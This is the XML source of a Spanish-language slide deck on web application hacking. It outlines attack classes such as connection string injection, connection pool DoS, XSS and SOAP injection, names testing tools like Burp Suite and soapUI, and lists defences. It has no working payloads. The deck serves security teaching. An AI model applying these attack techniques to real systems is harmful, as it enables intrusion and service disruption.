          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Las cadenas de conexión a la DB son utilizadas para conectar aplicaciones a los motores de BD.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Inyección de conexión de cadena. Ambiente de autenticación delegada, el atacante inyecta parámetros de cadena de conexión agregando un punto y coma (;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. Ataques Coonection String Parameter Pollution (CSPP). Hash Stealing, Port Scanning, Hijack Web Credentials.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1591852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8. Attack Data Connectivity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>3. Pool de conexiones DoS. El atacante examina las opciones de conexión pooling de la aplicación, construye una cadena SQL larga y maliciosa y ejecuta múltiples consultas simultáneas para consumir todas las conexiones de la pool, causando que las consultas de los usuarios legítimos fallen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="895386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n-US" dirty="0"/>
              <a:t>9. Attack Web App Client</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los atacantes interactúan con aplicaciones del lado del servidor de maneras inesperadas para realizar acciones maliciosas contra los usuarios finales y acceder a datos no autorizados. Cross-Site Scripting. Session Fixation. Redirection Attacks. Frame Injection. Request Forgery Attack. Privacy Attacks. HTTP Header Injection. ActiveX Attacks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3540018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10. Attack Web Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Los Servicios Web trabajan sobre las aplicaciones Web heredadas, cualquier ataque en el servicio Web será inmediatamente expuesto subyacentemente las aplicaciones de los negocios y vulnerabilidades lógicas para varios ataques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Probing Attacks, SOAP y XML Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Herramienta de ataque a Servicio Web: soapUI. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>carácterísticas: 1. Simulación de Servicio. 2. Prueba Funcional. 3. Prueba de Garga.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Otras: XMLSpy, modela, edita, transforma, depura tecnologías relacionadas con XML.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2558742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hacking Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Burp Suite Professional: Una plataforma de pruebas de seguridad de aplicaciones Web que soporta un proceso de prueba entero, desde el mapeo iniciar para el análisis de una superficie de ataque, hasta encontrar y explotar vulnerabilidades de seguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Cookie Digger: Ayuda a identificar generaciones de cookie débiles e implementaciones inseguras para la administración de la sesión. Recoleta y analiza cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2746735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hacking Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>WebScarab: Es un marco de trabajo para analizar aplicaciones que comunican utilizando protocolos HTTP y HTTPS. Permite al atacante revisar y modificar solicitudes, y respuestas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39969307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Las aplicaciones Web utilizan distintos esquemas de codificación para que sus datos manipulen caracteres inusuales de manera segura y datos binarios de manera segura. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1329619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URL Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%3d =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0a Nueva línea</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20 espacio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300852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Amenazas a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Cookie Poisoning.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Almacenamiento inseguro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Fuga de información.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Error de manipulación errónea.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Administración de cuenta violada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Directory Transversal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Manipulación de parámetros/formularios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>DoS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Buffer Overflow.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1852177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HTML Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%amp: &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;lt; &lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;gt; &gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7162667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Esquemas de codificación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Unicode 16 bits, UTF-8, Base64, Hex.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="721059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ataques SQL Injection?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Limitar la longitud de entrada del usuario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Utilizar mensajes de error personalizados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Monitorear el tráfico DB utilizando IDS, WAP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Deshabilitar comandos como xp_cmdshell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Aislar el servidor DB y el servidor Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Siempre utilizar el atributo del método establecido en POST.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Ejecutar la cuenta del servicio de DB con mínimos derechos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3613092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¿Cómo defenderse contra ataques SQL Injection?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Mover los procedimientos almacenados en un servidor aislado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Utilizar variables seguras o funciones como IsNumeric() para asegurar el tipo de seguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Validar y desinfectar las entradas pasadas del usuario a la base de datos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Utilizar una cuenta con bajos privilegios para conectar la DB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1137154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sz="4000" dirty="0"/>
              <a:t>¿Cómo defenderse contra las fallas de inyección de comandos?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Realizar validación de entrada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Utilizar librerías de lenguaje específicas que impidan problemas debido a los comandos de consola.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Utilizar API segura que impide enteramente el uso de un interpretador.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Utilizar consultas SQL parametizadas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Escapar a los caracteres peligrosos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Realizar codificación de entrada y salida.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Utilizar desasociación modular de consulta desde el kernel.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25362310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ataques XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Validar todos los encabezados, cookies, cadenas de consultas, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. Filtrar la salida de scripts puede también anular las vulnerabilidades XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>3. Codificar la entrada y salida y filtrar caracteres Meta en la entrada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>4. Utilizar firewall de aplicación para bloquear la ejecución de script malicioso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>5. No confíes siempre en sitios que utilicen HTTPS cuando se trate de XSS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15590151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¿Cómo defenderse contra ataques XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>6. Convertir todos los caracteres no alfa numéricos a caracteres de entidad HTML antes de mostrar la entrada del usuario en buscadores y foros.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>7. Utilizar herramientas de prueba extensivamente durante la fase de diseño para eliminar agujeros XSS en la aplicación antes de comenzar a utilizarla.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>8. Desarrollar algunos scripts estándar o firmados con claves públicas y privadas que comprueben efectivamente para comprobar que el script introducido fue realmente autenticado.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3535876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ataques DoS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Configurar el firewall para denegar acceso de tráfico ICMP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Asegurar la administración remota y pruebas de conectividad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Prevenir el uso de funciones innecesarias como gets, strcpy, y direcciones de retorno de direcciones de sobre escritura, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Prevenir la sobre escritura de la información sensible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Realizar una validación completa de entrada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Los datos procesados por el atacante no deben dejarse ejecutar.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32304162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de los ataques de servicios Web?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Configurar Control de acceso WSDL, para permitir o denegar acceso de cualquier tpo de mensajes SOAP basados en WSDL, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Implementar firewalls capaces de proteger servicios Web, nivel de filtrado SOAP y ISAPI, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Implementar solicitudes centralizadas in-line y respuestas de validación de esquema, bloquear referencias externas, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4028781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r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Impedir redirecciones y renvíos, caso contrario asegurarse que el valor provisto es válido y autorizado para el usuario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>No crear o utilizar algoritmos débiles, generar las claves offline y almacenarlas de manera segura.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Cerrar sesión inmediatamente después de utilizar aplicaciones Web y limpiar el historial, no permitir que su navegador y sitios web guarden detalles de inicio de sesión.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Utilizar SSL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116545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a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Manipulación de Logs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Input invalidado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Inyección de defectos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Falsificación de solicitudes cross site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
